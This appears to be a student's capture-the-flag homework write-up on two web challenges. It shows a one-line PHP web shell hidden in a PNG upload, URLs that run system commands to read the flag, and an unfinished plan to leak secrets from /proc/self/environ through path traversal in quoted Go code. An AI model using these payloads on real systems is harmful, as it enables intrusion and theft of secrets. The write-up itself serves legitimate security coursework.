###### tags: `NTU`
<style>
.markdown-body {
font-family: 'Arial', -apple-system, BlinkMacSystemFont, 'Segoe WPC', 'Segoe UI', system-ui, 'Ubuntu', 'Droid Sans', sans-serif;
line-height: 1.6;
} !important;
</style>
# HW2 Writeup
## Imgura
### Information Leak
I use the tool called denny0223/scrabble to extract .git repo from the server. And then checkout to the first commit to restore the hidden files that should be on the server.
### Upload
The most trickest part of this problem to understand that only file with .php extension will be included. And there is no way to circumvent this problem. The trick to add a %00 (null character) has already be removed in PHP5.
> It took me 2 days to figure out. :cry:
```php
<?php
include ($_GET['page'] ?? 'pages/main') . ".php";
?>
```
Therefore, the only solution is to add a .php suffix in uploading file. For example, google-400x400.png.php
And then I use hex editor to write the follwing php code into png file. Since the server blocks `<?php` in the uploading file, I tried several shorthands and find out `<?=` is the one that works.
```php
<?= eval($_GET['cmd']); ?>
```
Finally, I have execute code on the server and see the flag using following links.
https://imgura.chal.h4ck3r.quest/dev_test_page/index.php?page=images/800ed3e4_google-400x4002.png&cmd=system(%27ls%20-la%20/%27);
https://imgura.chal.h4ck3r.quest/dev_test_page/index.php?page=images/800ed3e4_google-400x4002.png&cmd=system(%27cat%20/this_is_flaggggg%27);
### Output of `system('ls -la /');`
## DVD Screensaver
### Path traversal
First, we need to find the value of `SECRET_KEY`. It is stored in the environment variable of the container.
I suspect that the call to `ReadFile` in the /static route is exploitable. We can use this route to read the file `/proc/self/environ` for us. It will contain all the environment variables in the container. However, I can't figure out how to do to within the deadline.
```go
http.HandleFunc("/static/", func(w http.ResponseWriter, r *http.Request) {
filename := strings.TrimPrefix(r.URL.Path, "/static/")
content, err := os.ReadFile(filepath.Join("./static/", filename))
...
```
Sign in with Wallet
Connect another wallet